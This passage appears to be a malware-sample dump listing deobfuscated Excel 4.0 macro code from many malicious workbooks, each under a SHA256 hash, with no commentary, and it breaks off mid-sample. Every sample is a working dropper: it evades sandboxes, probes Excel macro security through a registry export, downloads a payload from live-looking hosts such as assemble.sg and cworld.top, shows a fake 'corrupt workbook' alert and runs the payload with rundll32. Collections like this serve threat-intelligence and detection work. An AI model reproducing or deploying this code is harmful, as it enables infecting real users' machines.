  348. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  349. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B38B39B40B42B43
  350. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  351. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  352. =WAIT(NOW()+"00:00:03")
  353. =FOPEN("c:\users\public\1.reg")
  354. =FPOS(R[-1]C, 215)
  355. =FREAD(R[-2]C, 255)H19H20H22H23
  356. =FCLOSE(R[-3]C)
  357. =FILE.DELETE("c:\users\public\1.reg")
  358. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)K54K55K56K57K58K60K61
  359. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://fcowhcwsb.space/erg4ewr1","c:\Users\Public\b7gf5ef.html",0,0)
  360. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M115
  361. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5ef.html,DllRegisterServer",0,5)N150N151N152N153N154N155N156N157N158N159N160N161N162N163N164
  362. =CLOSE(FALSE)
  363.  
  364. SHA256: 12f66f168341e3ef08e507ed7fed7a45d9430bfc6b57309bd803500be64ad07c
  365. eR0cw301Q7
  366. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  367. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B38B39B40B42B43
  368. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  369. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  370. =WAIT(NOW()+"00:00:03")
  371. =FOPEN("c:\users\public\1.reg")
  372. =FPOS(R[-1]C, 215)
  373. =FREAD(R[-2]C, 255)H19H20H22H23
  374. =FCLOSE(R[-3]C)
  375. =FILE.DELETE("c:\users\public\1.reg")
  376. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)K54K55K56K57K58K60K61
  377. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://fcowhcwsb.space/erg4ewr1","c:\Users\Public\b7gf5ef.html",0,0)
  378. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M115
  379. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5ef.html,DllRegisterServer",0,5)N150N151N152N153N154N155N156N157N158N159N160N161N162N163N164
  380. =CLOSE(FALSE)
  381.  
  382. SHA256: 145217e66d1ebecad8f32ca5bc7509bdc54de95a7d78c920265ae83509dccb37
  383. 7ZCMO74AQP
  384. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  385. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  386. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  387. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  388. =WAIT(NOW()+"00:00:03")
  389. =FOPEN("c:\users\public\1.reg")
  390. =FPOS(R[-1]C, 215)
  391. =FREAD(R[-2]C, 255)
  392. =FCLOSE(R[-3]C)
  393. =FILE.DELETE("c:\users\public\1.reg")
  394. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  395. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  396. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  397. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  398. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  399. =CLOSE(FALSE)
  400.  
  401. SHA256: 15275c0f7feb25bbd1c64d37ea7489849579bca9565239c82cbc6e74c09268fa
  402. bqMI30Wiy8
  403. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  404. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  405. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  406. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  407. =WAIT(NOW()+"00:00:03")
  408. =FOPEN("c:\users\public\1.reg")
  409. =FPOS(R[-1]C, 215)
  410. =FREAD(R[-2]C, 255)
  411. =FCLOSE(R[-3]C)
  412. =FILE.DELETE("c:\users\public\1.reg")
  413. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  414. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  415. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  416. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  417. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  418. =CLOSE(FALSE)
  419.  
  420. SHA256: 166e74a958e76ee50f889b092efa506e3b659bed1c3d82dfbcc95b90792a6746
  421. FittEFrAdI
  422. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))A36A37A38A39A41A42
  423. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  424. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  425. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210
  426. =WAIT(NOW()+"00:00:03")
  427. =FOPEN("c:\users\public\1.reg")
  428. =FPOS(R[-1]C, 215)G20G21G22
  429. =FREAD(R[-2]C, 255)
  430. =FCLOSE(R[-I15]C)
  431. =FILE.DELETE("c:\users\public\1.reg")J39J41J42J43J44
  432. =IF(ISNUMBER(SEARCH("0001",R[-K37]C)),CLOSE(FALSE),)
  433. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)L132L133L134L135L137L138L139
  434. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M114
  435. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5)N149N150N151N152N153N154N155N156N157N158N159N160N161N162N163
  436. =CLOSE(FALSE)
  437.  
  438. SHA256: 170b4ddc50e479fc45194bf011b125de4883f8dc7dd40b8fa2d5515504abe20d
  439. Kfu7SLR0IM
  440. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  441. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  442. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  443. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  444. =WAIT(NOW()+"00:00:03")
  445. =FOPEN("c:\users\public\1.reg")
  446. =FPOS(R[-1]C, 215)
  447. =FREAD(R[-2]C, 255)
  448. =FCLOSE(R[-3]C)
  449. =FILE.DELETE("c:\users\public\1.reg")
  450. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  451. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  452. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  453. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  454. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  455. =CLOSE(FALSE)
  456.  
  457. SHA256: 17c22e5fb4e7d9833ad3a3bb99d2dbceec35d65ca3df2f2f594447a6d43256cf
  458. wu93ecGFih
  459. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))A36A37A38A39A41A42
  460. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  461. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  462. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210
  463. =WAIT(NOW()+"00:00:03")
  464. =FOPEN("c:\users\public\1.reg")
  465. =FPOS(R[-1]C, 215)G20G21G22
  466. =FREAD(R[-2]C, 255)
  467. =FCLOSE(R[-I15]C)
  468. =FILE.DELETE("c:\users\public\1.reg")J39J41J42J43J44
  469. =IF(ISNUMBER(SEARCH("0001",R[-K37]C)),CLOSE(FALSE),)
  470. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)L132L133L134L135L137L138L139
  471. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M114
  472. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5)N149N150N151N152N153N154N155N156N157N158N159N160N161N162N163
  473. =CLOSE(FALSE)
  474.  
  475. SHA256: 17f0df4bcdecef88fc634fee9ec560cd81e935b3bdab569ce58536039074da73
  476. iUMcuYCtgM
  477. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  478. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  479. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  480. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  481. =WAIT(NOW()+"00:00:03")
  482. =FOPEN("c:\users\public\1.reg")
  483. =FPOS(R[-1]C, 215)
  484. =FREAD(R[-2]C, 255)
  485. =FCLOSE(R[-3]C)
  486. =FILE.DELETE("c:\users\public\1.reg")
  487. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  488. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  489. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  490. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  491. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  492. =CLOSE(FALSE)
  493.  
  494. SHA256: 17f7fba52659e49bbcd788022bc079ed9a0028680c5ce9cb09b6ccc148cf7d9b
  495. AZUGq26uHL
  496. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  497. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  498. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  499. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  500. =WAIT(NOW()+"00:00:03")
  501. =FOPEN("c:\users\public\1.reg")
  502. =FPOS(R[-1]C, 215)
  503. =FREAD(R[-2]C, 255)
  504. =FCLOSE(R[-3]C)
  505. =FILE.DELETE("c:\users\public\1.reg")
  506. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  507. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
  508. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  509. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  510. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
  511. =CLOSE(FALSE)
  512.  
  513. SHA256: 1a0e08248e3a6e053afc293482b48f1c2fe345cd863ed63cb279599ce8a099b8
  514. voU4d5XpJq
  515. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  516. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  517. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  518. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  519. =WAIT(NOW()+"00:00:03")
  520. =FOPEN("c:\users\public\1.reg")
  521. =FPOS(R[-1]C, 215)
  522. =FREAD(R[-2]C, 255)
  523. =FCLOSE(R[-3]C)
  524. =FILE.DELETE("c:\users\public\1.reg")
  525. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  526. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  527. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  528. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  529. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  530. =CLOSE(FALSE)
  531.  
  532. SHA256: 1aecc59781e07fe93184cbea2dd82738ccd76045d6eda669329afa151aab0f17
  533. jSKc0lq44Y
  534. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  535. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  536. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  537. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  538. =WAIT(NOW()+"00:00:03")
  539. =FOPEN("c:\users\public\1.reg")
  540. =FPOS(R[-1]C, 215)
  541. =FREAD(R[-2]C, 255)
  542. =FCLOSE(R[-3]C)
  543. =FILE.DELETE("c:\users\public\1.reg")
  544. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  545. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  546. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  547. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  548. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  549. =CLOSE(FALSE)
  550.  
  551. SHA256: 1c3cadbdb6d9f6ddd42dac0e52a8f657e567b6e9edcd01bcce264fe46760aca5
  552. nFH9bnd4EH
  553. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  554. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  555. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  556. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  557. =WAIT(NOW()+"00:00:03")
  558. =FOPEN("c:\users\public\1.reg")
  559. =FPOS(R[-1]C, 215)
  560. =FREAD(R[-2]C, 255)
  561. =FCLOSE(R[-3]C)
  562. =FILE.DELETE("c:\users\public\1.reg")
  563. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  564. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  565. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  566. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  567. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  568. =CLOSE(FALSE)
  569.  
  570. SHA256: 1ecf507dc0a49cd73615cfc22cbc8ff62526b22de1168ce99f2657fe0dadb788
  571. TfD5aFMSWc
  572. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  573. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B38B39B40B42B43
  574. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  575. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  576. =WAIT(NOW()+"00:00:03")
  577. =FOPEN("c:\users\public\1.reg")
  578. =FPOS(R[-1]C, 215)
  579. =FREAD(R[-2]C, 255)H19H20H22H23
  580. =FCLOSE(R[-3]C)
  581. =FILE.DELETE("c:\users\public\1.reg")
  582. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)K54K55K56K57K58K60K61
  583. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://fcowhcwsb.space/erg4ewr1","c:\Users\Public\b7gf5ef.html",0,0)
  584. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M115
  585. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5ef.html,DllRegisterServer",0,5)N150N151N152N153N154N155N156N157N158N159N160N161N162N163N164
  586. =CLOSE(FALSE)
  587.  
  588. SHA256: 1f54709a54ae7300279115188cf9015dad5146e59b6306e69026dce75c74e115
  589. Ahczh7gQND
  590. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  591. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))B36B37B39B40B41B42B43
  592. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  593. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D184D185D186D187D188D189D190D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210D211
  594. =WAIT(NOW()+"00:00:03")
  595. =FOPEN("c:\users\public\1.reg")
  596. =FPOS(R[-1]C, 215)
  597. =FREAD(R[-2]C, 255)H21H22H24
  598. =FCLOSE(R[-3]C)
  599. =FILE.DELETE("c:\users\public\1.reg")
  600. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  601. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://greentec-automation.com/wp-crun.php","c:\Users\Public\csg75ef.html",0,0)L124L125L126L127L129L130L131L132L133L134L136L137L138L139
  602. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://narensyndicate.com/wp-crun.php","c:\Users\Public\bwep5ef.html",0,0),)
  603. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)N115
  604. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)O149O150O151O152O153O154O155O156O157O158O159O160O161O162O163O164
  605. =CLOSE(FALSE)
  606.  
  607. SHA256: 1fad7907d00ac5c87fcb492de8273d41fbef51f8d8b1364f75e81a56577841ee
  608. uIMssE6kx6
  609. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  610. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  611. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  612. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  613. =WAIT(NOW()+"00:00:03")
  614. =FOPEN("c:\users\public\1.reg")
  615. =FPOS(R[-1]C, 215)
  616. =FREAD(R[-2]C, 255)
  617. =FCLOSE(R[-3]C)
  618. =FILE.DELETE("c:\users\public\1.reg")
  619. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  620. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  621. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  622. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  623. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  624. =CLOSE(FALSE)
  625.  
  626. SHA256: 1ff80c5aeff03dc83112cddf2e807c281f09a09cdd1c53de68334ee04d97d987
  627. lvXQLgbvza
  628. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  629. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  630. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  631. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  632. =WAIT(NOW()+"00:00:03")
  633. =FOPEN("c:\users\public\1.reg")
  634. =FPOS(R[-1]C, 215)
  635. =FREAD(R[-2]C, 255)
  636. =FCLOSE(R[-3]C)
  637. =FILE.DELETE("c:\users\public\1.reg")
  638. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
  639. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://assemble.sg/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0)
  640. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cworld.top/wp-front.php","c:\Users\Public\c6sga5ef.html",0,0),)
  641. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
  642. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\c6sga5ef.html,DllRegisterServer",0,5)
  643. =CLOSE(FALSE)
  644.  
  645. SHA256: 22bb1293cfd109d0b8bd44d410f379deb8c4d02b095552b8954c6a75e5bc9ae9
  646. NwdFvU2zLF
  647. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))A36A37A38A39A41A42
  648. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  649. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  650. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210
  651. =WAIT(NOW()+"00:00:03")
  652. =FOPEN("c:\users\public\1.reg")
  653. =FPOS(R[-1]C, 215)G20G21G22
  654. =FREAD(R[-2]C, 255)
  655. =FCLOSE(R[-I15]C)
  656. =FILE.DELETE("c:\users\public\1.reg")J39J41J42J43J44
  657. =IF(ISNUMBER(SEARCH("0001",R[-K37]C)),CLOSE(FALSE),)
  658. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)L132L133L134L135L137L138L139
  659. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M114
  660. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5)N149N150N151N152N153N154N155N156N157N158N159N160N161N162N163
  661. =CLOSE(FALSE)
  662.  
  663. SHA256: 2458eec040213f72bb3ac118c26cb49ceb7f3591d1a534e4533f1ddaf07b49a1
  664. Vg7lBHOb7F
  665. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))A36A37A38A39A41A42
  666. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  667. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  668. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)D191D192D193D194D195D196D197D198D199D200D201D202D203D204D205D206D207D208D209D210
  669. =WAIT(NOW()+"00:00:03")
  670. =FOPEN("c:\users\public\1.reg")
  671. =FPOS(R[-1]C, 215)G20G21G22
  672. =FREAD(R[-2]C, 255)
  673. =FCLOSE(R[-I15]C)
  674. =FILE.DELETE("c:\users\public\1.reg")J39J41J42J43J44
  675. =IF(ISNUMBER(SEARCH("0001",R[-K37]C)),CLOSE(FALSE),)
  676. =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://efbzfyvsb.website/f2f23","c:\Users\Public\b7gf5yk.html",0,0)L132L133L134L135L137L138L139
  677. =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)M114
  678. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\b7gf5yk.html,DllRegisterServer",0,5)N149N150N151N152N153N154N155N156N157N158N159N160N161N162N163
  679. =CLOSE(FALSE)
  680.  
  681. SHA256: 246688f7cf49c8641cca934340e61415a599d0f60d3db7db6e1d95334a760128
  682. pFlDGDPmak
  683. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  684. =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
  685. =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
  686. =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
  687. =WAIT(NOW()+"00:00:03")
  688. =FOPEN("c:\users\public\1.reg")
  689. =FPOS(R[-1]C, 215)
  690. =FREAD(R[-2]C, 255)
  691. =FCLOSE(R[-3]C)
  692. =FILE.DELETE("c:\users\public\1.reg")
  693. =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
